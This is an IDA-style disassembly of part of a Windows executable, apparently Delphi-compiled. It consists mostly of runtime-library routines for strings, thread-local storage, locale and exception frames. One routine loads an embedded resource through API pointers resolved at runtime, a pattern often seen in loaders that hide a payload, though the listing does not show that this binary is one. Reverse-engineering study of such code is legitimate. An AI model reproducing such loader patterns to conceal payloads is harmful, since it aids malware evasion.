jz short loc_4035FD
mov edx, eax
mov eax, esi
call sub_4028E0
loc_4035FD: ; CODE XREF: sub_4035DC+16�j
mov eax, ebx
call sub_403518
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_4035DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40360C proc near ; CODE XREF: sub_4037E0+3B�p
; sub_4037E0+69�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edx
push eax
mov eax, [ebp+arg_0]
push eax
push ecx
push 0
mov eax, ds:dword_4075A8
push eax
call sub_401070 ; MultiByteToWideChar
pop ebp
retn 4
sub_40360C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403628 proc near ; CODE XREF: sub_4042A4+130�p
; sub_4042A4+153�p
push edx
mov edx, esp
mov ecx, 1
call sub_4035DC
pop edx
retn
sub_403628 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403638 proc near ; CODE XREF: CODE:00404B31�p
; CODE:00404B58�p ...
xor ecx, ecx
test edx, edx
jz short loc_40365F
push edx
loc_40363F: ; CODE XREF: sub_403638+1D�j
cmp cl, [edx]
jz short loc_40365A
cmp cl, [edx+1]
jz short loc_403659
cmp cl, [edx+2]
jz short loc_403658
cmp cl, [edx+3]
jz short loc_403657
add edx, 4
jmp short loc_40363F
; ---------------------------------------------------------------------------
loc_403657: ; CODE XREF: sub_403638+18�j
inc edx
loc_403658: ; CODE XREF: sub_403638+13�j
inc edx
loc_403659: ; CODE XREF: sub_403638+E�j
inc edx
loc_40365A: ; CODE XREF: sub_403638+9�j
mov ecx, edx
pop edx
sub ecx, edx
loc_40365F: ; CODE XREF: sub_403638+4�j
jmp sub_4035DC
sub_403638 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403668 proc near ; CODE XREF: sub_403A1C+36�p
; CODE:00404DBD�p
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_403675
not ecx
loc_403675: ; CODE XREF: sub_403668+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_4035DC
sub_403668 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403680 proc near ; CODE XREF: sub_4042A4+48�p
; sub_4042A4+93�p ...
test eax, eax
jz short locret_403687
mov eax, [eax-4]
locret_403687: ; CODE XREF: sub_403680+2�j
retn
sub_403680 endp
; =============== S U B R O U T I N E =======================================
sub_403688 proc near ; CODE XREF: sub_4042A4+13B�p
; sub_4042A4+15E�p
test edx, edx
jz short locret_4036CB
mov ecx, [eax]
test ecx, ecx
jz sub_40356C
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_4036C0
call sub_403734
mov eax, esi
mov ecx, [esi-4]
loc_4036B3: ; CODE XREF: sub_403688+41�j
mov edx, [ebx]
add edx, edi
call sub_4028E0
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4036C0: ; CODE XREF: sub_403688+1F�j
call sub_403734
mov eax, [ebx]
mov ecx, edi
jmp short loc_4036B3
; ---------------------------------------------------------------------------
locret_4036CB: ; CODE XREF: sub_403688+2�j
retn
sub_403688 endp
; =============== S U B R O U T I N E =======================================
sub_4036CC proc near ; CODE XREF: sub_403E54+14�p
; sub_4042A4+20�p ...
test eax, eax
jz short locret_4036DA
mov edx, [eax-8]
inc edx
jle short locret_4036DA
lock inc dword ptr [eax-8]
locret_4036DA: ; CODE XREF: sub_4036CC+2�j
; sub_4036CC+8�j
retn
sub_4036CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4036DC proc near ; CODE XREF: sub_403E54+82�p
; CODE:00404779�p ...
test eax, eax
jz short loc_4036E2
retn
; ---------------------------------------------------------------------------
byte_4036E1 db 0 ; DATA XREF: sub_4036DC:loc_4036E2�o
; ---------------------------------------------------------------------------
loc_4036E2: ; CODE XREF: sub_4036DC+2�j
mov eax, offset byte_4036E1
retn
sub_4036DC endp
; =============== S U B R O U T I N E =======================================
sub_4036E8 proc near ; CODE XREF: sub_40372C�j
mov edx, [eax]
test edx, edx
jz short loc_403726
mov ecx, [edx-8]
dec ecx
jz short loc_403726
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_4035B0
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_4028E0
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_403723
lock dec dword ptr [eax-8]
jnz short loc_403723
lea eax, [eax-8]
call sub_4027FC
loc_403723: ; CODE XREF: sub_4036E8+2B�j
; sub_4036E8+31�j
mov edx, [ebx]
pop ebx
loc_403726: ; CODE XREF: sub_4036E8+4�j
; sub_4036E8+A�j
mov eax, edx
retn
sub_4036E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40372C proc near ; CODE XREF: CODE:00404D6C�p
; CODE:00404E33�p
jmp sub_4036E8
sub_40372C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403734 proc near ; CODE XREF: sub_402920+B3�p
; sub_403688+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_403789
mov eax, [ebx]
test eax, eax
jz short loc_40376A
cmp dword ptr [eax-8], 1
jnz short loc_40376A
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_40281C
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_403792
; ---------------------------------------------------------------------------
loc_40376A: ; CODE XREF: sub_403734+11�j
; sub_403734+17�j
mov eax, edx
call sub_4035B0
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_403789
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_403784
mov ecx, esi
loc_403784: ; CODE XREF: sub_403734+4C�j
call sub_4028E0
loc_403789: ; CODE XREF: sub_403734+B�j
; sub_403734+43�j
mov eax, ebx
call sub_403518
mov [ebx], edi
loc_403792: ; CODE XREF: sub_403734+34�j
pop edi
pop esi
pop ebx
retn
sub_403734 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4037A0
loc_403798: ; CODE XREF: sub_4037A0+E�j
; sub_40386C+12�j
mov al, 1
jmp sub_4028C4
; END OF FUNCTION CHUNK FOR sub_4037A0
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4037A0 proc near ; CODE XREF: sub_4038DC+12�p
; FUNCTION CHUNK AT 00403798 SIZE 00000007 BYTES
test eax, eax
jz short locret_4037B4
push eax
push 0
call sub_401090
test eax, eax
jz loc_403798
locret_4037B4: ; CODE XREF: sub_4037A0+2�j
retn
sub_4037A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4037B8 proc near ; CODE XREF: sub_4038DC+3E�p
xchg edx, [eax]
test edx, edx
jz short locret_4037C4
push edx
call sub_401098
locret_4037C4: ; CODE XREF: sub_4037B8+4�j
retn
sub_4037B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4037C8 proc near ; CODE XREF: sub_4037E0+1B�p
; sub_40386C+2�j ...
mov edx, [eax]
test edx, edx
jz short locret_4037DC
mov dword ptr [eax], 0
push eax
push edx
call sub_401098
pop eax
locret_4037DC: ; CODE XREF: sub_4037C8+4�j
retn
sub_4037C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4037E0 proc near ; CODE XREF: sub_403890:loc_4038B7�j
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFF004h
push eax
add esp, 0FFFFFFFCh
mov esi, ecx
mov [esp+1014h+var_1014], edx
mov edi, eax
test esi, esi
jg short loc_403802
mov eax, edi
call sub_4037C8
jmp short loc_40385F
; ---------------------------------------------------------------------------
loc_403802: ; CODE XREF: sub_4037E0+17�j
lea ebp, [esi+1]
cmp ebp, 7FFh
jge short loc_403835
push esi
lea eax, [esp+1018h+var_1010]
mov ecx, [esp+1018h+var_1014]
mov edx, 7FFh
call sub_40360C
mov ebx, eax
test ebx, ebx
jle short loc_403835
lea edx, [esp+1014h+var_1010]
mov eax, edi
mov ecx, ebx
call sub_40386C
jmp short loc_40385F
; ---------------------------------------------------------------------------
loc_403835: ; CODE XREF: sub_4037E0+2B�j
; sub_4037E0+44�j
mov ebx, ebp
mov eax, edi
mov edx, ebx
call sub_4038DC
push esi
mov eax, [edi]
mov ecx, [esp+1018h+var_1014]
mov edx, ebx
call sub_40360C
mov ebx, eax
test ebx, ebx
jge short loc_403856
xor ebx, ebx
loc_403856: ; CODE XREF: sub_4037E0+72�j
mov eax, edi
mov edx, ebx
call sub_4038DC
loc_40385F: ; CODE XREF: sub_4037E0+20�j
; sub_4037E0+53�j
add esp, 1004h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4037E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40386C proc near ; CODE XREF: sub_4037E0+4E�p
test ecx, ecx
jz sub_4037C8
push eax
push ecx
push edx
call sub_401090
test eax, eax
jz loc_403798
pop edx
push dword ptr [edx]
mov [edx], eax
call sub_401098
retn
sub_40386C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403890 proc near ; CODE XREF: CODE:0040479F�p
xor ecx, ecx
test edx, edx
jz short loc_4038B7
push edx
loc_403897: ; CODE XREF: sub_403890+1D�j
cmp cl, [edx]
jz short loc_4038B2
cmp cl, [edx+1]
jz short loc_4038B1
cmp cl, [edx+2]
jz short loc_4038B0
cmp cl, [edx+3]
jz short loc_4038AF
add edx, 4
jmp short loc_403897
; ---------------------------------------------------------------------------
loc_4038AF: ; CODE XREF: sub_403890+18�j
inc edx
loc_4038B0: ; CODE XREF: sub_403890+13�j
inc edx
loc_4038B1: ; CODE XREF: sub_403890+E�j
inc edx
loc_4038B2: ; CODE XREF: sub_403890+9�j
mov ecx, edx
pop edx
sub ecx, edx
loc_4038B7: ; CODE XREF: sub_403890+4�j
jmp sub_4037E0
sub_403890 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4038C0 proc near ; CODE XREF: CODE:004047A7�p
test eax, eax
jz short loc_4038C8
retn
; ---------------------------------------------------------------------------
align 2
word_4038C6 dw 0 ; DATA XREF: sub_4038C0:loc_4038C8�o
; ---------------------------------------------------------------------------
loc_4038C8: ; CODE XREF: sub_4038C0+2�j
mov eax, offset word_4038C6
retn
sub_4038C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4038D0 proc near ; CODE XREF: sub_4038DC+1C�p
test eax, eax
jz short locret_4038D9
mov eax, [eax-4]
shr eax, 1
locret_4038D9: ; CODE XREF: sub_4038D0+2�j
retn
sub_4038D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4038DC proc near ; CODE XREF: sub_4037E0+5B�p
; sub_4037E0+7A�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, edx
mov esi, eax
xor eax, eax
mov [esp+0Ch+var_C], eax
test ebx, ebx
jle short loc_403915
mov eax, ebx
call sub_4037A0
mov [esp+0Ch+var_C], eax
mov eax, [esi]
call sub_4038D0
test eax, eax
jle short loc_403915
cmp ebx, eax
jge short loc_403907
mov eax, ebx
loc_403907: ; CODE XREF: sub_4038DC+27�j
mov ecx, eax
add ecx, ecx
mov edx, [esp+0Ch+var_C]
mov eax, [esi]
call sub_4028E0
loc_403915: ; CODE XREF: sub_4038DC+E�j
; sub_4038DC+23�j
mov eax, esi
mov edx, [esp+0Ch+var_C]
call sub_4037B8
pop edx
pop esi
pop ebx
retn
sub_4038DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403924 proc near ; DATA XREF: sub_403AE4+2F�o
; BSS:off_407000�o
mov al, 11h
jmp sub_4028C4
sub_403924 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40392C proc near ; CODE XREF: sub_403998+1D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, ds:dword_406024
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40397F
loc_403946: ; CODE XREF: sub_40392C+51�j
xor eax, eax
push ebp
push offset loc_403967
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_403971
; ---------------------------------------------------------------------------
loc_403967: ; DATA XREF: sub_40392C+1D�o
jmp loc_402E60
; ---------------------------------------------------------------------------
call sub_403018
loc_403971: ; CODE XREF: sub_40392C+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_403946
loc_40397F: ; CODE XREF: sub_40392C+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_40392C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403988 proc near ; CODE XREF: sub_403C88+5�p
mov edx, ds:dword_406020
mov [eax], edx
mov ds:dword_406020, eax
retn
sub_403988 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403998 proc near ; CODE XREF: sub_403420+76�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_403A11
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_40392C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403A18
loc_4039C7: ; CODE XREF: sub_403998+7E�j
mov eax, [ebp+var_4]
cmp eax, ds:dword_406020
jnz short loc_4039DE
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_406020, eax
jmp short loc_403A10
; ---------------------------------------------------------------------------
loc_4039DE: ; CODE XREF: sub_403998+38�j
mov eax, ds:dword_406020
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403A10
loc_4039EC: ; CODE XREF: sub_403998+76�j
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, [ebp+var_4]
jnz short loc_403A02
mov eax, [ebp+var_4]
mov eax, [eax]
mov edx, [ebp+var_8]
mov [edx], eax
jmp short loc_403A10
; ---------------------------------------------------------------------------
loc_403A02: ; CODE XREF: sub_403998+5C�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4039EC
loc_403A10: ; CODE XREF: sub_403998+44�j
; sub_403998+52�j ...
retn
; ---------------------------------------------------------------------------
loc_403A11: ; DATA XREF: sub_403998+C�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_4039C7
; ---------------------------------------------------------------------------
loc_403A18: ; CODE XREF: sub_403998:loc_403A10�j
; DATA XREF: sub_403998+2A�o
pop ecx
pop ecx
pop ebp
retn
sub_403998 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A1C proc near ; CODE XREF: sub_403AE4+AD�p
; sub_403AE4+BE�p
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor edx, edx
mov [ebp+var_10], edx
xor edx, edx
push ebp
push offset loc_403A82
push dword ptr fs:[edx]
mov fs:[edx], esp
push 7
lea edx, [ebp+var_B]
push edx
push 1004h
push eax
call sub_401050 ; GetLocaleInfoA
lea eax, [ebp+var_10]
lea edx, [ebp+var_B]
mov ecx, 7
call sub_403668
mov eax, [ebp+var_10]
lea edx, [ebp+var_4]
call sub_402B88
mov ebx, eax
cmp [ebp+var_4], 0
jz short loc_403A6C
xor ebx, ebx
loc_403A6C: ; CODE XREF: sub_403A1C+4C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403A89
loc_403A79: ; CODE XREF: sub_403A1C+6B�j
lea eax, [ebp+var_10]
call sub_403518
retn
; ---------------------------------------------------------------------------
loc_403A82: ; DATA XREF: sub_403A1C+F�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_403A79
; ---------------------------------------------------------------------------
loc_403A89: ; CODE XREF: sub_403A1C+65�j
; DATA XREF: sub_403A1C+58�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_403A1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A90 proc near ; DATA XREF: CODE:004045A0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403ADA
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4075A4
jnz short loc_403ACC
mov eax, offset dword_407038
call sub_402AF4
mov eax, offset dword_407204
call sub_402AF4
mov eax, offset dword_4073D0
call sub_402AF4
call sub_4019F4
loc_403ACC: ; CODE XREF: sub_403A90+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403AE1
loc_403AD9: ; CODE XREF: sub_403A90+4F�j
retn
; ---------------------------------------------------------------------------
loc_403ADA: ; DATA XREF: sub_403A90+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_403AD9
; ---------------------------------------------------------------------------
loc_403AE1: ; CODE XREF: sub_403A90:loc_403AD9�j
; DATA XREF: sub_403A90+44�o
pop ebp
retn
sub_403A90 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403AE4 proc near ; DATA XREF: CODE:0040459C�o
sub ds:dword_4075A4, 1
jnb locret_403BB6
mov ds:byte_40600C, 2
mov ds:off_407010, offset sub_401008
mov ds:off_407014, offset sub_401010
mov ds:byte_407036, 2
mov ds:off_407000, offset sub_403924
call sub_402C64
test al, al
jz short loc_403B2B
call sub_402C94
loc_403B2B: ; CODE XREF: sub_403AE4+40�j
call sub_402D58
mov ds:word_40703C, 0D7B0h
mov ds:word_407208, 0D7B0h
mov ds:word_4073D4, 0D7B0h
call sub_401048 ; GetCommandLineA
mov ds:dword_40702C, eax
call sub_4010B0
mov ds:dword_407028, eax
call sub_4010A8 ; GetVersion
and eax, 80000000h
cmp eax, 80000000h
jz short loc_403B9D
call sub_4010A8 ; GetVersion
and eax, 0FFh
cmp ax, 4
jbe short loc_403B8C
mov ds:dword_4075A8, 3
jmp short loc_403BAC
; ---------------------------------------------------------------------------
loc_403B8C: ; CODE XREF: sub_403AE4+9A�j
call sub_401068 ; GetThreadLocale
call sub_403A1C
mov ds:dword_4075A8, eax
jmp short loc_403BAC
; ---------------------------------------------------------------------------
loc_403B9D: ; CODE XREF: sub_403AE4+8A�j
call sub_401068 ; GetThreadLocale
call sub_403A1C
mov ds:dword_4075A8, eax
loc_403BAC: ; CODE XREF: sub_403AE4+A6�j
; sub_403AE4+B7�j
call sub_4010A0 ; GetCurrentThreadId
mov ds:dword_407020, eax
locret_403BB6: ; CODE XREF: sub_403AE4+7�j
retn
sub_403AE4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403BB8 proc near ; CODE XREF: sub_403C94+C�p
jmp ds:dword_408138
sub_403BB8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403BC0 proc near ; CODE XREF: sub_403BD8+7�p
jmp ds:dword_408134
sub_403BC0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403BC8 proc near ; CODE XREF: sub_403C48+25�p
; sub_403C48+36�p
jmp ds:dword_408130
sub_403BC8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403BD0 proc near ; CODE XREF: sub_403BF8+46�p
jmp ds:dword_40812C
sub_403BD0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403BD8 proc near ; CODE XREF: sub_403BF8+22�p
var_8 = dword ptr -8
push ebx
push ecx
mov ebx, eax
push ebx
push 40h
call sub_403BC0 ; LocalAlloc
mov [esp+8+var_8], eax
mov eax, [esp+8+var_8]
pop edx
pop ebx
retn
sub_403BD8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403BF0 proc near ; CODE XREF: sub_403BF8+2�p
mov eax, 8
retn
sub_403BF0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403BF8 proc near ; CODE XREF: sub_403C48:loc_403C62�p
var_8 = dword ptr -8
push ebx
push ecx
call sub_403BF0
mov ebx, eax
test ebx, ebx
jz short loc_403C43
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_403C18
mov eax, 0E2h
call sub_40350C
; ---------------------------------------------------------------------------
loc_403C18: ; CODE XREF: sub_403BF8+14�j
mov eax, ebx
call sub_403BD8
mov [esp+8+var_8], eax
cmp [esp+8+var_8], 0
jnz short loc_403C34
mov eax, 0E2h
call sub_40350C
; ---------------------------------------------------------------------------
jmp short loc_403C43
; ---------------------------------------------------------------------------
loc_403C34: ; CODE XREF: sub_403BF8+2E�j
mov eax, [esp+8+var_8]
push eax
mov eax, ds:TlsIndex
push eax
call sub_403BD0 ; TlsSetValue
loc_403C43: ; CODE XREF: sub_403BF8+B�j
; sub_403BF8+3A�j
pop edx
pop ebx
retn
sub_403BF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403C48 proc near ; CODE XREF: sub_402878+20�p
; sub_4028D0+3�p ...
mov cl, ds:byte_40764C
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_403C7D
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_403C62: ; CODE XREF: sub_403C48+3D�j
call sub_403BF8
mov eax, ds:TlsIndex
push eax
call sub_403BC8 ; TlsGetValue
test eax, eax
jz short loc_403C77
retn
; ---------------------------------------------------------------------------
loc_403C77: ; CODE XREF: sub_403C48+2C�j
mov eax, ds:dword_407658
retn
; ---------------------------------------------------------------------------
loc_403C7D: ; CODE XREF: sub_403C48+D�j
push eax
call sub_403BC8 ; TlsGetValue
test eax, eax
jz short loc_403C62
retn
sub_403C48 endp
; =============== S U B R O U T I N E =======================================
sub_403C88 proc near ; CODE XREF: sub_403C94+2E�p
mov eax, offset dword_40608C
call sub_403988
retn
sub_403C88 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403C94 proc near ; CODE XREF: CODE:0040460B�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0
call sub_403BB8 ; GetModuleHandleA
mov ds:dword_407650, eax
mov eax, ds:dword_407650
mov ds:dword_406090, eax
xor eax, eax
mov ds:dword_406094, eax
xor eax, eax
mov ds:dword_406098, eax
call sub_403C88
mov edx, offset dword_40608C
mov eax, ebx
call sub_4032C8
pop ebx
retn
sub_403C94 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CD8 proc near ; DATA XREF: CODE:00404598�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403CFD
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407654
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403D04
loc_403CFC: ; CODE XREF: sub_403CD8+2A�j
retn
; ---------------------------------------------------------------------------
loc_403CFD: ; DATA XREF: sub_403CD8+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_403CFC
; ---------------------------------------------------------------------------
loc_403D04: ; CODE XREF: sub_403CD8:loc_403CFC�j
; DATA XREF: sub_403CD8+1F�o
pop ebp
retn
sub_403CD8 endp
; ---------------------------------------------------------------------------
align 4
loc_403D08: ; DATA XREF: CODE:off_404594�o
sub ds:dword_407654, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D10 proc near ; DATA XREF: CODE:004045A8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403D35
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_40765C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403D3C
loc_403D34: ; CODE XREF: sub_403D10+2A�j
retn
; ---------------------------------------------------------------------------
loc_403D35: ; DATA XREF: sub_403D10+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_403D34
; ---------------------------------------------------------------------------
loc_403D3C: ; CODE XREF: sub_403D10:loc_403D34�j
; DATA XREF: sub_403D10+1F�o
pop ebp
retn
sub_403D10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403D40 proc near ; DATA XREF: CODE:004045A4�o
sub ds:dword_40765C, 1
retn
sub_403D40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403D48 proc near ; CODE XREF: CODE:00404CDC�p
jmp ds:dword_408148
sub_403D48 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403D50 proc near ; CODE XREF: sub_403E54+79�p
jmp ds:dword_408144
sub_403D50 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403D58 proc near ; CODE XREF: CODE:004047D0�p
; CODE:004047F3�p ...
jmp ds:dword_408140
sub_403D58 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D60 proc near ; DATA XREF: CODE:004045B0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403D85
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407660
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403D8C
loc_403D84: ; CODE XREF: sub_403D60+2A�j
retn
; ---------------------------------------------------------------------------
loc_403D85: ; DATA XREF: sub_403D60+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_403D84
; ---------------------------------------------------------------------------
loc_403D8C: ; CODE XREF: sub_403D60:loc_403D84�j
; DATA XREF: sub_403D60+1F�o
pop ebp
retn
sub_403D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403D90 proc near ; DATA XREF: CODE:004045AC�o
sub ds:dword_407660, 1
retn
sub_403D90 endp
; =============== S U B R O U T I N E =======================================
sub_403D98 proc near ; CODE XREF: CODE:00404D1D�p
; CODE:00404D4D�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov esi, eax
push 0Ah
push edx
mov eax, ds:dword_407650
push eax
call ds:dword_407664 ; FindResourceA
mov ebx, eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_407668 ; SizeofResource
mov [esi], eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_40766C ; LoadResource
mov ebx, eax
push ebx
call ds:dword_407670 ; SetHandleCount
mov [esp+0Ch+var_C], eax
cmp [esp+0Ch+var_C], 0
jz short loc_403DE3
push ebx
call ds:dword_407674 ; FreeResource
loc_403DE3: ; CODE XREF: sub_403D98+42�j
mov eax, [esp+0Ch+var_C]
pop edx
pop esi
pop ebx
retn
sub_403D98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DEC proc near ; DATA XREF: CODE:004045B8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403E11
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076B0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403E18
loc_403E10: ; CODE XREF: sub_403DEC+2A�j
retn
; ---------------------------------------------------------------------------
loc_403E11: ; DATA XREF: sub_403DEC+6�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_403E10
; ---------------------------------------------------------------------------
loc_403E18: ; CODE XREF: sub_403DEC:loc_403E10�j
; DATA XREF: sub_403DEC+1F�o
pop ebp
retn
sub_403DEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E1C proc near ; DATA XREF: CODE:004045B4�o
sub ds:dword_4076B0, 1
retn
sub_403E1C endp
; =============== S U B R O U T I N E =======================================
sub_403E24 proc near ; CODE XREF: sub_403E54+253�p
add edx, eax
mov eax, edx
retn
sub_403E24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E2C proc near ; CODE XREF: sub_403E54+10F�p
push edx
push eax
mov eax, ds:off_4060D8
mov eax, [eax]
call eax
retn
sub_403E2C endp
; =============== S U B R O U T I N E =======================================
sub_403E38 proc near ; CODE XREF: sub_403E54+18E�p
var_4 = dword ptr -4
push ecx
